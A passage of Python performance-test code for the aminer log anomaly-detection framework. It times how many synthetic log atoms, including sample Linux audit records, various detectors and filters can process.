DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_combo_detector) measured_time += timeit.timeit(lambda: new_match_path_value_combo_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_new_match_path_value_detector(self, number_of_paths): """Run the performance tests for NewMatchValueDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, path_list, [ self.stream_printer_event_handler], 'Default', True, True) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_detector) measured_time += timeit.timeit(lambda: new_match_path_value_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_value_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_time_correlation_detector(self, number_of_rules): """Run the performance tests for TimeCorrelationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: time_correlation_detector = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], number_of_rules, 'Default', self.waiting_time * 9000, True, True, True, 1, 5) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, time_correlation_detector) measured_time += timeit.timeit(lambda: time_correlation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_detector.__class__.__name__, avg, results, 'test_count=%d.' % number_of_rules) def run_time_correlation_violation_detector(self, chance): """Run the performance tests for TimeCorrelationViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: correlation_rule = CorrelationRule('Correlation', 0, chance, artefact_match_parameters=[('/integer/d0', '/integer/d1')]) a_class_selector = EventClassSelector('Selector1', [correlation_rule], None) b_class_selector = EventClassSelector('Selector2', None, [correlation_rule]) rules = [Rules.PathExistsMatchRule('/integer/d0', a_class_selector), Rules.PathExistsMatchRule('/integer/d1', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector( self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) s = time.time() measured_time = 0 i = 0 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd0', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) while measured_time < self.waiting_time / 10: integer = '/integer' r = random.randint(1, 100) decimal_integer_value_me1 = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me1.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s + r / 100, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) s = s + r / 100 if r / 100 >= chance: match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) i = i + 1 time_correlation_violation_detector.do_timer(s) i = i + 2 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_violation_detector.__class__.__name__, avg, results, '%d%% chance of not finding an element' % ((1 - chance) * 100)) def run_timestamp_correction_filters(self, number_of_paths): """Run the performance tests for TimestampCorrectionFilters.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([new_match_path_detector]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, simple_monotonic_timestamp_adjust) measured_time += timeit.timeit(lambda: simple_monotonic_timestamp_adjust.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( simple_monotonic_timestamp_adjust.__class__.__name__, avg, results, 'a %s and %d different path(es).' % (new_match_path_detector.__class__.__name__, number_of_paths)) def run_timestamps_unsorted_detector(self, reset_factor): """Run the performance tests for TimestampsUnsortedDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: timestamps_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [ self.stream_printer_event_handler]) s = time.time() i = 0 measured_time = 0 mini = 100 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) r = random.randint(1, 100) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s + min(r, mini), timestamps_unsorted_detector) measured_time += timeit.timeit(lambda: timestamps_unsorted_detector.receive_atom(log_atom), number=1) if mini > r: mini = r else: mini = mini + reset_factor i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( timestamps_unsorted_detector.__class__.__name__, avg, results, 'a reset_factor of %f.' % reset_factor) def run_allowlist_violation_detector(self, number_of_paths, modulo_factor): """Run the performance tests for AllowlistViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 rules = [] while i < number_of_paths: rules.append(PathExistsMatchRule(self.integerd + str(i % number_of_paths), None)) i = i + 1 allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, rules, [self.stream_printer_event_handler]) t = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: r = random.randint(1, 100) if r >= modulo_factor: r = 2 else: r = 1 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % (number_of_paths * r)), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, allowlist_violation_detector) measured_time += timeit.timeit(lambda: allowlist_violation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( allowlist_violation_detector.__class__.__name__, avg, results, '%d different PathExistsMatchRules and a moduloFactor of %d.' % (number_of_paths, modulo_factor)) def run_new_match_id_value_combo_detector(self, min_allowed_time_diff): """Run the performance tests for NewMatchIdValueComboDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines)-1) line = log_lines[r] log_atom = LogAtom( line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += timeit.timeit(lambda: new_match_id_value_combo_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_id_value_combo_detector.__class__.__name__, avg, results, '%.2f seconds min_allowed_time_diff.' % min_allowed_time_diff) def run_parser_count(self, set_path_list, report_after_number_of_elements): """Run the performance tests for ParserCount.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: if set_path_list: parser_count = ParserCount(self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [ self.stream_printer_event_handler], report_after_number_of_elements) else: parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler], report_after_number_of_elements) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines) - 1) line = log_lines[r] log_atom = LogAtom(line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += timeit.timeit(lambda: parser_count.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( parser_count.__class__.__name__, avg, results, 'set_path_list: %s, report_after_number_of_elements: %d' % (set_path_list, report_after_number_of_elements)) def run_event_correlation_detector(self, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis): """Run the performance tests for EventCorrelationDetector.""" alphabet = b'abcdefghijklmnopqrstuvwxyz' children = [] for i, char in enumerate(alphabet): char = bytes([char]) children.append(FixedDataModelElement(char.decode(), char)) alphabet_model = FirstMatchModelElement('first', children) # training phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], generation_factor=generation, generation_probability=generation, max_hypotheses=max_hypotheses, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypothesis_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) # check_phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd.learn_mode = False t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) def run_match_filter(self, number_of_paths): """Run the performance tests for MatchFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) match_filter = MatchFilter(self.aminer_config, ['d' + str(i) for i in range(number_of_paths)], [ self.stream_printer_event_handler]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, match_filter) measured_time += timeit.timeit(lambda: match_filter.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_filter.__class__.__name__, avg, results, 'a %s and %d different path(es).' % 